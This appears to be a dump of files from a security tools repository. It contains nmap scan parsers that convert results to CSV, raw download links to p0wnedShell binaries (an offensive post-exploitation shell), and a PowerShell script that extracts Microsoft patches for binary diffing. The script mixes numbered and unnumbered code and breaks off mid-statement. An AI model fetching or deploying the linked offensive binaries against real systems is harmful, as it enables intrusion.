429 | attribute_list = map(lambda x: x * max_number, attribute_list) 430 | 431 | return attribute_list 432 | 433 | def generate_csv(fd, results, output_format, header, newline, user_delimiter) : 434 | """ 435 | Generate a plain ';' separated csv file with the desired or default attribute format 436 | 437 | @param fd : output file descriptor, could be a true file or stdout 438 | """ 439 | if results != {} : 440 | spamwriter = csv.writer(fd, delimiter=user_delimiter) 441 | 442 | if header == YES_HEADER: 443 | csv_header = [format_item.upper() for format_item in output_format.split('-')] 444 | spamwriter.writerow(csv_header) 445 | 446 | for IP in sorted(results.iterkeys()) : 447 | formatted_attribute_list = [] 448 | 449 | for index,format_item in enumerate(output_format.split('-')) : 450 | item = formatted_item(results[IP], format_item) 451 | formatted_attribute_list.insert(index, item) 452 | 453 | formatted_attribute_list = repeat_attributes(formatted_attribute_list) 454 | 455 | for line_to_write in itertools.izip(*formatted_attribute_list): 456 | spamwriter.writerow(list(line_to_write)) 457 | 458 | # Print a newline if asked 459 | if newline == YES_NEWLINE: 460 | spamwriter.writerow('') 461 | 462 | return 463 | 464 | def main(options, arguments): 465 | 466 | # Supplied format 467 | output_format = DEFAULT_FORMAT 468 | if options.format != None : 469 | if check_supplied_format(options.format) == VALID_FORMAT : 470 | output_format = options.format 471 | else: 472 | parser.error("Please specify a valid output format.\n\ 473 | Supported objects are { fqdn, ip, mac_address, mac_vendor, port, protocol, os, service, version }.") 474 | 475 | # Input descriptor 476 | if (options.input != None) : 477 | fd_input = open(options.input, 'rb') 478 | else : 479 | # No input file specified, reading from stdin 480 | fd_input = sys.stdin 481 | 482 | # Analysis 483 | results = parse(fd_input) 484 | fd_input.close() 485 | 486 | # Output descriptor 487 | if (options.output != None) : 488 
| fd_output = open(options.output, 'wb') 489 | else : 490 | # No output file specified, writing to stdout 491 | fd_output = sys.stdout 492 | 493 | # Newline 494 | newline = {True : YES_NEWLINE, False : NO_NEWLINE}[options.newline != None] 495 | 496 | # Header 497 | header = {True : NO_HEADER, False : YES_HEADER}[options.skip_header != None] 498 | 499 | # CSV output 500 | if (options.delimiter != None) : 501 | generate_csv(fd_output, results, output_format, header, newline, options.delimiter) 502 | else : 503 | generate_csv(fd_output, results, output_format, header, newline, ';') 504 | fd_output.close() 505 | 506 | return 507 | 508 | if __name__ == "__main__" : 509 | parser = OptionParser() 510 | for option in options : 511 | param = option['name'] 512 | del option['name'] 513 | parser.add_option(*param, **option) 514 | 515 | options, arguments = parser.parse_args() 516 | main(options, arguments) 517 | -------------------------------------------------------------------------------- /nmap-xml-parser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #Source: https://github.com/interference-security/scripts-tools-shells/blob/master/nmap-ip-port-service-info.py 4 | #Author: Interference Security 5 | 6 | #Usage: nmap-ip-port-service-info.py [-h] -f INPUTFILE [-o OUTFILE] 7 | #Example: nmap-ip-port-service-info.py -f input_nmap.xml -o output_file.csv 8 | 9 | try: 10 | import sys 11 | import argparse 12 | from datetime import datetime 13 | from libnmap.parser import NmapParser 14 | except: 15 | print "Error: Missing python packages\n" 16 | print "Please ensure you have the following python packages installed:\n argparse, python-libnmap\n" 17 | print "How to install:\npip install \neasy_install \n" 18 | sys.exit(0) 19 | 20 | #Description of script 21 | parser = argparse.ArgumentParser(description="Nmap XML parser and generate CSV ouput") 22 | 23 | #Script command line options 24 | parser.add_argument('-i', 
'--inputfile', help='Input Nmap XML file', required=True) 25 | parser.add_argument('-o','--outfile', help='Save output in CSV file') 26 | #parser.add_argument('-O','--open', help='Show only open ports') 27 | 28 | args = parser.parse_args() 29 | 30 | targets = [] 31 | 32 | #Disable requests module HTTPS certificate untrusted warning message 33 | try: 34 | requests.packages.urllib3.disable_warnings() 35 | except: 36 | pass 37 | 38 | def parse_nmap_xml(nmap_xml_file, output_file): 39 | oufile = "" 40 | f = None 41 | if len(output_file)>0: 42 | f = open (output_file, "w") 43 | nmap_parse = NmapParser.parse_fromfile(nmap_xml_file) 44 | for host in nmap_parse.hosts: 45 | #print host.address+":" 46 | for service in host.services: 47 | targets.append(host.address+","+str(service.port)+","+str(service.state)+","+service.service+","+service.banner) 48 | #print service.servicefp 49 | #print dir(service) 50 | data = "IP,Port,State,Service Name,Service Info" 51 | print data 52 | if f != None: 53 | f.write(data+"\n") 54 | for target in targets: 55 | print target 56 | if f != None: 57 | f.write(target+"\n") 58 | return targets 59 | 60 | #Main function 61 | output_file = "" 62 | input_file = args.inputfile.encode('utf-8') 63 | if args.outfile: 64 | output_file = args.outfile 65 | targets = parse_nmap_xml(input_file, output_file) 66 | -------------------------------------------------------------------------------- /p0wnedshell/README.md: -------------------------------------------------------------------------------- 1 | #p0wnedshell Binary 2 | 3 | -------------------------------------------------------------------------------- /p0wnedshell/Smallp0wnedShell-x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/p0wnedshell/Smallp0wnedShell-x64.exe -------------------------------------------------------------------------------- 
/p0wnedshell/Smallp0wnedShell-x86.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/p0wnedshell/Smallp0wnedShell-x86.exe -------------------------------------------------------------------------------- /p0wnedshell/p0wnedShell-x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/p0wnedshell/p0wnedShell-x64.exe -------------------------------------------------------------------------------- /p0wnedshell/p0wnedShell-x86.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/p0wnedshell/p0wnedShell-x86.exe -------------------------------------------------------------------------------- /patchextract.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | 3 | Source: http://pastebin.com/raw/VjwNV23n 4 | ____ ______ ______ ____ __ __ 5 | /\ _`\ /\ _ \ /\__ _\/\ _`\ /\ \/\ \ 6 | \ \ \L\ \\ \ \L\ \\/_/\ \/\ \ \/\_\\ \ \_\ \ 7 | \ \ ,__/ \ \ __ \ \ \ \ \ \ \/_/_\ \ _ \ 8 | \ \ \/ \ \ \/\ \ \ \ \ \ \ \L\ \\ \ \ \ \ 9 | \ \_\ \ \_\ \_\ \ \_\ \ \____/ \ \_\ \_\ 10 | \/_/ \/_/\/_/ \/_/ \/___/ \/_/\/_/ 11 | 12 | 13 | ____ __ __ ______ ____ ______ ____ ______ 14 | /\ _`\ /\ \ /\ \ /\__ _\/\ _`\ /\ _ \ /\ _`\ /\__ _\ 15 | \ \ \L\_\\ `\`\/'/'\/_/\ \/\ \ \L\ \\ \ \L\ \\ \ \/\_\\/_/\ \/ 16 | \ \ _\L `\/ > < \ \ \ \ \ , / \ \ __ \\ \ \/_/_ \ \ \ 17 | \ \ \L\ \ \/'/\`\ \ \ \ \ \ \\ \ \ \ \/\ \\ \ \L\ \ \ \ \ 18 | \ \____/ /\_\\ \_\ \ \_\ \ \_\ \_\\ \_\ \_\\ \____/ \ \_\ 19 | \/___/ \/_/ \/_/ \/_/ \/_/\/ / \/_/\/_/ \/___/ \/_/ 20 | 21 | 22 | __ __ _ __ 23 | /\ \/\ \ /' \ /'__`\ 24 | \ \ \ \ \ 
/\_, \ /\_\L\ \ 25 | \ \ \ \ \\/_/\ \ \/_/_\_<_ 26 | \ \ \_/ \ \ \ \ __ /\ \L\ \ 27 | \ `\___/ \ \_\/\_\\ \____/ 28 | `\/__/ \/_/\/_/ \/___/ 29 | 30 | 31 | ================ 32 | PATCHEXTRACT.PS1 33 | ================ 34 | Version 1.3 Microsoft MSU Patch Extraction and Patch Organization Utility by Greg Linares (@Laughing_Mantis) 35 | 36 | This PowerShell script will extract a Microsoft MSU update file and then organize the extracted files and folders. 37 | 38 | The extracted files are organized by their architecture (x86, x64, wow64 or MSIL) 39 | as well as by their content type, i.e. resource and catalog files are moved to a JUNK subfolder, the original patch, CAB and XML files go 40 | to a PATCH folder, and the patch binaries go to the per-architecture folders. 41 | 42 | This script was developed to help reverse engineers organize patches quickly so they can be binary-diffed faster and more easily. 43 | It was written especially with the new bulk Microsoft kernel patches in mind. 
44 | 45 | An example output folder structure would look like this: 46 | 47 | C:\PATCHES\MS15-XXX\PRE 48 | -x86 49 | - x86 Binary patched files 50 | -x64 51 | - x64 binary patched files 52 | -WOW64 53 | - syswow64 binary patched files 54 | -JUNK 55 | - resource, catalog, mum, and other non-binary based patched files 56 | -PATCH 57 | - original patch, cabs and xml files from the extraction 58 | -MSIL 59 | - MSIL .NET binary patched files ***New in Version 1.1*** 60 | 61 | Directories will automatically be renamed to filename-version to remove the garbage filler folder names 62 | 63 | 64 | ============= 65 | REQUIREMENTS 66 | ============= 67 | 'expand.exe' must be present in %WINDIR%\SYSTEM32 (it is by default) - it is executed with the current user's permissions 68 | A valid Microsoft MSU patch file to extract (PATCH variable). The script extracts whatever file it is given and does not refuse an unsigned or tampered patch, so verify the Authenticode signature (e.g. with Get-AuthenticodeSignature) of any MSU that did not come straight from Microsoft before running it. 69 | Directory and file write/creation permissions on the PATH folder specified 70 | 71 | 72 | ======= 73 | USAGE 74 | ======= 75 | 76 | Powershell -ExecutionPolicy Bypass -File PatchExtract.ps1 -Patch C:\Patches\Windows6.1-KB3088195-x64.msu -Path C:\Patches\MS15-XXX\POST\ 77 | 78 | 79 | This would extract the patch file C:\Patches\Windows6.1-KB3088195-x64.msu to the folder C:\Patches\MS15-XXX\POST\. 80 | It will then create all the organization subfolders within the C:\Patches\MS15-XXX\POST\ folder. 
81 | 82 | (Note: the optional PowerShell parameter '-ExecutionPolicy Bypass' is necessary in some environments to overcome PowerShell execution restrictions) 83 | 84 | ========== 85 | ARGUMENTS 86 | ========== 87 | -PATCH [REQUIRED] [NO DEFAULT] 88 | Specifies the MSU file that will be extracted to the specified PATH folder and then organized into the x86, x64, WOW, MSIL, JUNK and BIN folders specified 89 | The extract command will be "expand -F:* <PATCH> <PATH>" 90 | Non-MSU files have not been tested; however, if the extraction does not generate a CAB file (the indicator of a successful MSU extraction) 91 | the script assumes extraction failed. 92 | 93 | -PATH [OPTIONAL since 1.1] [DEFAULT: the folder containing the PATCH file] 94 | Specifies the folder that the PATCH file will be extracted and organized into 95 | If the specified folder does not exist yet, the user will be prompted whether to create it. 96 | Relative paths such as '.\POST' can be used but have not been tested extensively. 97 | 98 | ***New in Version 1.1*** 99 | The -PATH argument may now be omitted, in which case the patch is extracted into the folder that contains the PATCH file 100 | 101 | 102 | -x86 [OPTIONAL] [DEFAULT='x86'] 103 | 104 | Specifies the folder name within $PATH to store x86 patch binaries 105 | example: -x86 32bit 106 | 107 | 108 | -x64 [OPTIONAL] [DEFAULT='x64'] 109 | 110 | Specifies the folder name within $PATH to store x64 patch binaries 111 | example: -x64 64bit 112 | 113 | -WOW [OPTIONAL] [DEFAULT='WOW64'] 114 | 115 | Specifies the folder name within $PATH to store wow64 type patch binaries 116 | example: -WOW sysWOW64 117 | 118 | -MSIL [OPTIONAL] [DEFAULT='MSIL'] 119 | 120 | *** New in Version 1.1*** 121 | Specifies the folder name within $PATH to store .NET type patch binaries 122 | example: -MSIL DOTNET 123 | 124 | -JUNK [OPTIONAL] [DEFAULT='JUNK'] 125 | 126 | Specifies the folder name within $PATH to store resource, catalog and other files that are generally useless for diffing patch binaries 127 | example: -JUNK res 128 | 129 | 130 | -BIN [OPTIONAL] [DEFAULT='PATCH'] 131 | 132 | 
| Specifies the folder name within $PATH to store the extraction xml and the original patch msu and cab files 133 | example: -BIN bin 134 | 135 | 136 | ================ 137 | VERSION HISTORY 138 | ================ 139 | I originally wrote this as an ugly batch file sometime between 2014 and 2015 as a way to organize folders, but it was incomplete and buggy 140 | 141 | Oct 15, 2015 - Initial Public Release 1.0 142 | Oct 20, 2016 - Version 1.1 Released 143 | * Bug fixes handling the new naming format for patch .cab files 144 | * Added the ability to auto-extract to the same directory as the current PATCH 145 | * Filtered the output directory name format to aid in bindiffing 146 | 147 | Oct 20, 2016 - Version 1.2 Released 148 | * Bug fixes handling MSIL renaming issues and collisions when renaming patch folders 149 | 150 | Nov 7, 2016 - Version 1.25 Released 151 | * Added a hack to handle the subsequent CAB files Microsoft added in Windows 10 Cumulative Patches - will make a better way to handle this in 1.3 152 | 153 | March 15, 2017 - Version 1.3 Released 154 | * Color change to sweet vaporwave retro 80s colors 155 | * Cleaned up some awful code that I must have been on some amazing substances when I wrote 156 | * Spent several hours making a rad ASCII logo 157 | * Most importantly, fixed the sub-cab auto-extraction method for the nested CABs that Microsoft introduced in late 2016 158 | 159 | 160 | ========== 161 | LICENSING 162 | ========== 163 | This script is provided free as in beer. It probably has some bugs and coding issues; however, if you like it or find it useful please give me a shout out on twitter @Laughing_Mantis. 164 | Feedback is encouraged and I will likely be releasing new scripts, tools and training in the future if it is welcome. 
166 | 167 | 168 | -GLin 169 | 170 | #> 171 | 172 | 173 | 174 | 175 | Param 176 | ( 177 | 178 | [Parameter(ValueFromPipelineByPropertyName = $true)] 179 | [ValidateNotNullOrEmpty()] 180 | [string]$PATCH = "", 181 | 182 | [Parameter(ValueFromPipelineByPropertyName = $true)] 183 | [string]$PATH = "", 184 | 185 | [Parameter(ValueFromPipelineByPropertyName = $true)] 186 | [string]$x86 = "x86", 187 | 188 | [Parameter(ValueFromPipelineByPropertyName = $true)] 189 | [string]$x64 = "x64", 190 | 191 | [Parameter(ValueFromPipelineByPropertyName = $true)] 192 | [string]$WOW = "WOW64", 193 | 194 | [Parameter(ValueFromPipelineByPropertyName = $true)] 195 | [string]$MSIL = "MSIL", 196 | 197 | [Parameter(ValueFromPipelineByPropertyName = $true)] 198 | [string]$JUNK = "JUNK", 199 | 200 | [Parameter(ValueFromPipelineByPropertyName = $true)] 201 | [string]$BIN = "PATCH" 202 | 203 | ) 204 | 205 | Clear-Host 206 | $ASCIIART = @" 207 | ____ ______ ______ ____ __ __ 208 | /\ _`\ /\ _ \ /\__ _\/\ _`\ /\ \/\ \ 209 | \ \ \L\ \\ \ \L\ \\/_/\ \/\ \ \/\_\\ \ \_\ \ 210 | \ \ ,__/ \ \ __ \ \ \ \ \ \ \/_/_\ \ _ \ 211 | \ \ \/ \ \ \/\ \ \ \ \ \ \ \L\ \\ \ \ \ \ 212 | \ \_\ \ \_\ \_\ \ \_\ \ \____/ \ \_\ \_\ 213 | \/_/ \/_/\/_/ \/_/ \/___/ \/_/\/_/ 214 | 215 | 216 | ____ __ __ ______ ____ ______ ____ ______ 217 | /\ _`\ /\ \ /\ \ /\__ _\/\ _`\ /\ _ \ /\ _`\ /\__ _\ 218 | \ \ \L\_\\ `\`\/'/'\/_/\ \/\ \ \L\ \\ \ \L\ \\ \ \/\_\\/_/\ \/ 219 | \ \ _\L `\/ > < \ \ \ \ \ , / \ \ __ \\ \ \/_/_ \ \ \ 220 | \ \ \L\ \ \/'/\`\ \ \ \ \ \ \\ \ \ \ \/\ \\ \ \L\ \ \ \ \ 221 | \ \____/ /\_\\ \_\ \ \_\ \ \_\ \_\\ \_\ \_\\ \____/ \ \_\ 222 | \/___/ \/_/ \/_/ \/_/ \/_/\/ / \/_/\/_/ \/___/ \/_/ 223 | 224 | 225 | __ __ _ __ 226 | /\ \/\ \ /' \ /'__`\ 227 | \ \ \ \ \ /\_, \ /\_\L\ \ 228 | \ \ \ \ \\/_/\ \ \/_/_\_<_ 229 | \ \ \_/ \ \ \ \ __ /\ \L\ \ 230 | \ `\___/ \ \_\/\_\\ \____/ 231 | `\/__/ \/_/\/_/ \/___/ 232 | "@ 233 | 234 | Write-Host $ASCIIART -ForegroundColor Magenta 235 | Start-Sleep -s 3 236 | 237 | 238 | if 
($PATCH -eq "") 239 | { 240 | Throw ("Error: No PATCH file specified. Specify a valid Microsoft MSU Patch with the -PATCH argument") 241 | 242 | } 243 | 244 | if ((Split-Path $PATCH -Parent) -eq "") 245 | { 246 | # First look in current working directory for the relative filename 247 | $CurrentDir = $(get-location).Path; 248 | $PATCH = $CurrentDir + "\" + $PATCH 249 | 250 | # if that doesnt work we look in the current script directory (less likely) 251 | # but hey we tried 252 | if (!(Test-Path $PATCH)) 253 | { 254 | $scriptDir = Split-Path -Path $MyInvocation.MyCommand.Definition -Parent 255 | $PATCH = $scriptDir + "\" + $PATCH 256 | } 257 | } 258 | 259 | if (!(Test-Path $PATCH)) 260 | { 261 | Throw ("Error: Specified PATCH file ($PATCH) does not exist. Specify a valid Microsoft MSU Patch file with the -PATCH argument.") 262 | } 263 | 264 | if ($PATH -eq "") 265 | { 266 | $PATH = Split-Path $PATCH -Parent 267 | write-Host ("PATH = $PATH") -ForegroundColor White 268 | Write-Host ("No PATH folder specified. Will extract to $PATH folder.") -ForegroundColor White 269 | 270 | } 271 | 272 | #Bug Fix (Resolve-Path Error if invalid path was specified before the path was created) 273 | 274 | 275 | 276 | 277 | if (!($PATCH.ToUpper().EndsWith(".MSU"))) 278 | { 279 | Do 280 | { 281 | $Attempt = Read-Host ("Warning: Specified PATCH file ($PATCH) is not a MSU file type. Do you still want to attempt extraction? [Y] or [N]") 282 | } 283 | Until ('Y', 'y', 'n', 'N' -ccontains $Attempt) 284 | if ($Attempt.ToUpper() -eq 'N') 285 | { 286 | Write-Host ("Exiting...") -ForegroundColor DarkMagenta 287 | Exit 288 | } 289 | } 290 | 291 | if (!(Test-Path $PATH)) 292 | { 293 | Do 294 | { 295 | $Attempt = Read-Host ("Warning: Specified PATH folder ($PATH) does not exist. Do you want to create it? 
[Y] or [N]") 296 | } 297 | Until ('Y', 'y', 'n', 'N' -ccontains $Attempt) 298 | if ($Attempt.ToUpper() -eq 'N') 299 | { 300 | Write-Host ("Exiting...") -ForegroundColor DarkMagenta 301 | Exit 302 | } 303 | else 304 | { 305 | New-Item $PATH -Force -ItemType Directory 306 | Write-Host "Created $PATH Folder" -ForegroundColor Cyan 307 | } 308 | } 309 | 310 | $PATCH = Resolve-Path $PATCH 311 | $PATH = Resolve-Path $PATH 312 | 313 | Write-Host "Patch to Extract: $PATCH" -ForegroundColor Magenta 314 | Write-Host "Extraction Path: $PATH" -ForegroundColor Magenta 315 | Write-Host "x86 File Storage Folder Name: $x86" -ForegroundColor Magenta 316 | Write-Host "x64 File Storage Folder Name: $x64" -ForegroundColor Magenta 317 | Write-Host "WOW64 File Storage Folder Name: $WOW" -ForegroundColor Magenta 318 | Write-Host "MSIL File Storage Folder Name: $MSIL" -ForegroundColor Magenta 319 | Write-Host "Junk File Storage Folder Name: $JUNK" -ForegroundColor Magenta 320 | Write-Host "Orignal Patch File Storage Folder Name: $BIN" -ForegroundColor Magenta 321 | 322 | 323 | 324 | $PATCHx86 = Join-Path -path $PATH -ChildPath $x86 325 | $PATCHx64 = Join-Path -path $PATH -ChildPath $x64 326 | $PATCHWOW = Join-Path -path $PATH -ChildPath $WOW 327 | $PATCHMSIL = Join-Path -path $PATH -ChildPath $MSIL 328 | $PATCHJUNK = Join-Path -path $PATH -ChildPath $JUNK 329 | $PATCHCAB = Join-Path -path $PATH -ChildPath $BIN 330 | 331 | 332 | if (!(Test-Path $PATCHx86 -pathType Container)) 333 | { 334 | New-Item $PATCHx86 -Force -ItemType Directory 335 | Write-Host "Making $PATCHx86 Folder" -ForegroundColor Cyan 336 | } 337 | 338 | if (!(Test-Path $PATCHx64 -pathType Container)) 339 | { 340 | New-Item $PATCHx64 -Force -ItemType Directory 341 | Write-Host "Making $PATCHx64 Folder" -ForegroundColor Cyan 342 | } 343 | 344 | if (!(Test-Path $PATCHWOW -pathType Container)) 345 | { 346 | New-Item $PATCHWOW -Force -ItemType Directory 347 | Write-Host "Making $PATCHWOW Folder" -ForegroundColor Cyan 348 | } 349 | 
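if (!(Test-Path $PATCHMSIL -pathType Container))
{
    New-Item $PATCHMSIL -Force -ItemType Directory
    Write-Host "Making $PATCHMSIL Folder" -ForegroundColor Cyan
}

if (!(Test-Path $PATCHJUNK -pathType Container))
{
    New-Item $PATCHJUNK -Force -ItemType Directory
    Write-Host "Making $PATCHJUNK Folder" -ForegroundColor Cyan
}

if (!(Test-Path $PATCHCAB -pathType Container))
{
    New-Item $PATCHCAB -Force -ItemType Directory
    Write-Host "Making $PATCHCAB Folder" -ForegroundColor Cyan
}


# expand.exe is always taken from the real system32 folder, never from the working directory or %PATH%.
$SYSPATH = Join-Path -path (get-item env:\windir).Value -ChildPath "system32"

$EXPAND = Join-Path -path $SYSPATH -ChildPath "expand.exe"


if (!(Test-Path $EXPAND))
{
    Throw ("Error: Cannot find 'Expand.exe' in the $SYSPATH folder.")
}


# Runs 'expand -F:* <Archive> <Destination>', waits for it and returns the exit code.
# Each argument is quoted on its own so paths containing spaces survive the Start-Process command line.
# A non-zero exit code is only a warning here: the callers check for the files they expect afterwards
# and throw themselves when something is missing.
function Invoke-Expand
{
    Param
    (
        [Parameter(Mandatory = $true)]
        [string]$Archive,

        [Parameter(Mandatory = $true)]
        [string]$Destination
    )

    $expandArgs = @('-F:*', ('"' + $Archive + '"'), ('"' + $Destination + '"'))
    Write-Host "Executing the following command: $EXPAND $expandArgs" -ForegroundColor Cyan

    $expandProcess = Start-Process -FilePath $EXPAND -ArgumentList $expandArgs -Wait -NoNewWindow -PassThru
    if ($expandProcess.ExitCode -ne 0)
    {
        Write-Warning "expand.exe returned exit code $($expandProcess.ExitCode) while extracting $Archive"
    }
    return $expandProcess.ExitCode
}


# Extracts every .cab found directly under $Folder into $Folder, then parks the .cab itself in $PATCHCAB.
# WSUSSCAN.cab only carries update metadata, so it is moved without being extracted.
# $Label is used for the console output only ("Main-Cab" / "Sub-Cab").
function Expand-CabsIn
{
    Param
    (
        [Parameter(Mandatory = $true)]
        [string]$Folder,

        [Parameter(Mandatory = $true)]
        [string]$Label
    )

    $cabFiles = Get-ChildItem -Path $Folder -Filter *.cab
    foreach ($cabFile in $cabFiles)
    {
        # FullName sidesteps the PowerShell-version-dependent ToString() of FileInfo (Name on 5.1, full path
        # on newer versions) that Join-Path would otherwise be fed.
        $cabPath = $cabFile.FullName
        Write-Host "CAB File: $cabPath" -ForegroundColor White

        if ($cabFile.Name -ne "WSUSSCAN.cab")
        {
            Write-Host "${Label}: $cabPath" -ForegroundColor Magenta
            if (!(Test-Path $cabPath))
            {
                Throw "Error: Patch .CAB File [$cabPath] could not be located. Patch Extraction failed - please send notification of this error to @Laughing_Mantis."
            }
            $null = Invoke-Expand -Archive $cabPath -Destination $Folder
        }

        Write-Host "Moving $cabPath to $PATCHCAB" -ForegroundColor Magenta
        # Best effort on purpose: a .cab that cannot be moved (for instance a name clash in $PATCHCAB) is left in place.
        Move-Item $cabPath $PATCHCAB -Force -ErrorAction SilentlyContinue
    }
}


# The script does not validate the archive itself: expand.exe writes whatever the MSU/CAB contains
# under $PATH with the current user's rights. Warn loudly when the patch is not validly signed so an
# unsigned or tampered file is not unpacked and diffed by mistake. This is a warning, not a refusal,
# because the user may knowingly be extracting a non-MSU test file (see the prompt above).
try
{
    $patchSignature = Get-AuthenticodeSignature -FilePath $PATCH
    if ($patchSignature.Status -ne 'Valid')
    {
        Write-Warning "Patch $PATCH does not carry a valid Authenticode signature (status: $($patchSignature.Status)). Make sure it really came from Microsoft before trusting the extracted files."
    }
}
catch
{
    Write-Warning "Could not check the Authenticode signature of ${PATCH}: $_"
}

# Pass 0: unpack the MSU itself. It yields one or more .cab files plus xml/txt metadata.
$null = Invoke-Expand -Archive $PATCH -Destination $PATH

# Pass 1: unpack the .cab(s) the MSU contained.
Expand-CabsIn -Folder $PATH -Label "Main-Cab"

# Pass 2: since late 2016 (Windows 10 cumulative updates) the main .cab can itself contain further .cabs,
# so one more pass picks up whatever pass 1 unpacked. Nesting deeper than that is not handled.
Expand-CabsIn -Folder $PATH -Label "Sub-Cab"


# Sort the expanded component folders by architecture. PSIsContainer is used instead of comparing
# Attributes to 'Directory': that comparison misses folders that also carry Hidden, ReadOnly or other flags.
$PATCHFolders = Get-ChildItem -Path $PATH -Force -ErrorAction SilentlyContinue | where { $_.PSIsContainer }

# Folder name prefix -> destination folder. The prefixes are disjoint, so the order does not matter.
$destinationByPrefix = @(
    @{ Prefix = "x86_";   Folder = $PATCHx86 },
    @{ Prefix = "amd64_"; Folder = $PATCHx64 },
    @{ Prefix = "wow64_"; Folder = $PATCHWOW },
    @{ Prefix = "msil_";  Folder = $PATCHMSIL }
)

foreach ($folder in $PATCHFolders)
{
    # Resource-only component folders are useless for binary diffing whatever their architecture.
    if ($folder.Name.Contains(".resources_"))
    {
        Move-Item $folder.FullName $PATCHJUNK -Force
        Write-Host "Moving $($folder.Name) to $PATCHJUNK" -ForegroundColor Cyan
        Continue
    }

    foreach ($rule in $destinationByPrefix)
    {
        if ($folder.Name.StartsWith($rule.Prefix))
        {
            Move-Item $folder.FullName $rule.Folder -Force
            Write-Host "Moving $($folder.Name) to $($rule.Folder)" -ForegroundColor Cyan
            break
        }
    }
}

<# PRETTY BINDIFF OUTPUT - changes folder names from x86-microsoft-windows-filename-hash-version-garbage to filename-version #>

$PATCHFolders = Get-ChildItem -Path $PATCHx86 -Force -ErrorAction SilentlyContinue | where { $_.PSIsContainer }

foreach ($folder in $PATCHFolders)
{
    # Component folders are named <arch>_[microsoft-windows-]<name>_<publickeytoken>_<version>_<language>_<hash>;
    # only <name>_<version> is kept. Name is compared explicitly because ToString() on a DirectoryInfo
    # returns the full path on newer PowerShell versions, which would never match "x86_*".
    if ($folder.Name -like "x86_microsoft-windows-*")
    {
        $newfolder = $folder.Name.Replace("x86_microsoft-windows-", "")
        $color = "Magenta"
    }
    elseif ($folder.Name -like "x86_*")
    {
        $newfolder = $folder.Name.Replace("x86_", "")
        $color = "Cyan"
    }
    else
    {
        Continue
    }

    $nameParts = $newfolder.Split("_")
    if ($nameParts.Length -lt 3)
    {
        # Not the expected naming scheme: leave it alone rather than produce a "<name>_" folder with no version.
        Write-Warning "Unexpected folder name format, not renaming: $($folder.Name)"
        Continue
    }
    $newname = $nameParts[0] + "_" + $nameParts[2]

    $target = Join-Path -Path $PATCHx86 -ChildPath $newname
    if (Test-Path $target)
    {
        # Two components with the same name and version (e.g. different languages) would collide here.
        Write-Warning "Target folder $target already exists, not renaming: $($folder.Name)"
        Continue
    }

    Write-Host ("Renaming $($folder.Name) to $newname") -ForegroundColor $color
    Rename-Item -path $folder.FullName -newName ($newname)
}
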
$PATCHFolders = Get-ChildItem -Path $PATCHx64 -Force -ErrorAction SilentlyContinue | where {$_.Attributes -eq 'Directory'} 574 | 575 | foreach ($folder in $PATCHFolders) 576 | { 577 | if ($folder -like "amd64_microsoft-windows-*") 578 | { 579 | $newfolder = $folder.Name.Replace("amd64_microsoft-windows-", "") 580 | $newname = $newfolder.Split("_")[0] 581 | $version = $newfolder.Split("_")[2] 582 | $newname = $newname + "_" + $version 583 | Write-Host ("Renaming $folder to $newname") -ForegroundColor Magenta 584 | Rename-Item -path $folder.FullName -newName ($newname) 585 | } 586 | elseif ($folder -like "amd64_*") 587 | { 588 | $newfolder = $folder.Name.Replace("amd64_", "") 589 | $newname = $newfolder.Split("_")[0] 590 | $version = $newfolder.Split("_")[2] 591 | $newname = $newname + "_" + $version 592 | Write-Host ("Renaming $folder to $newname") -ForegroundColor Cyan 593 | Rename-Item -path $folder.FullName -newName ($newname) 594 | } 595 | } 596 | 597 | $PATCHFolders = Get-ChildItem -Path $PATCHWOW -Force -ErrorAction SilentlyContinue | where {$_.Attributes -eq 'Directory'} 598 | 599 | foreach ($folder in $PATCHFolders) 600 | { 601 | if ($folder -like "wow64_microsoft-windows-*") 602 | { 603 | $newfolder = $folder.Name.Replace("wow64_microsoft-windows-", "") 604 | $newname = $newfolder.Split("_")[0] 605 | $version = $newfolder.Split("_")[2] 606 | $newname = $newname + "_" + $version 607 | Write-Host ("Renaming $folder to $newname") -ForegroundColor Magenta 608 | Rename-Item -path $folder.FullName -newName ($newname) 609 | } 610 | elseif ($folder -like "wow64_*") 611 | { 612 | $newfolder = $folder.Name.Replace("wow64_", "") 613 | $newname = $newfolder.Split("_")[0] 614 | $version = $newfolder.Split("_")[2] 615 | $newname = $newname + "_" + $version 616 | Write-Host ("Renaming $folder to $newname") -ForegroundColor Cyan 617 | Rename-Item -path $folder.FullName -newName ($newname) 618 | } 619 | } 620 | 621 | $PATCHFolders = Get-ChildItem -Path $PATCHMSIL -Force 
-ErrorAction SilentlyContinue | where {$_.Attributes -eq 'Directory'} 622 | 623 | foreach ($folder in $PATCHFolders) 624 | { 625 | if ($folder -like "msil_*") 626 | { 627 | $newfolder = $folder.Name.Replace("msil_", "") 628 | $newname = $newfolder.Split("_")[0] 629 | $version = $newfolder.Split("_")[2] 630 | $newname = $newname + "_" + $version 631 | Write-Host ("Renaming $folder to $newname") -ForegroundColor Cyan 632 | Rename-Item -path $folder.FullName -newName ($newname) 633 | } 634 | 635 | } 636 | 637 | $Junkfiles = Get-ChildItem -Path $PATH -Force -ErrorAction SilentlyContinue 638 | 639 | 640 | foreach ($JunkFile in $Junkfiles) 641 | { 642 | 643 | try 644 | { 645 | if (($JunkFile.Name.EndsWith(".manifest")) -or ($JunkFile.Name.EndsWith(".cat")) -or ($JunkFile.Name.EndsWith(".mum"))) 646 | { 647 | Move-Item $JunkFile.FullName $PATCHJUNK -Force -ErrorAction SilentlyContinue 648 | Write-Host "Moving $JunkFile to $PATCHJUNK" -ForegroundColor Magenta 649 | Continue 650 | } 651 | 652 | if (($JunkFile.Name.EndsWith(".cab")) -or ($JunkFile.Name.EndsWith(".xml")) -or ($JunkFile.Name.EndsWith(".msu")) -or ($JunkFile.Name.EndsWith("pkgProperties.txt"))) 653 | { 654 | Move-Item $JunkFile.FullName $PATCHCAB -Force 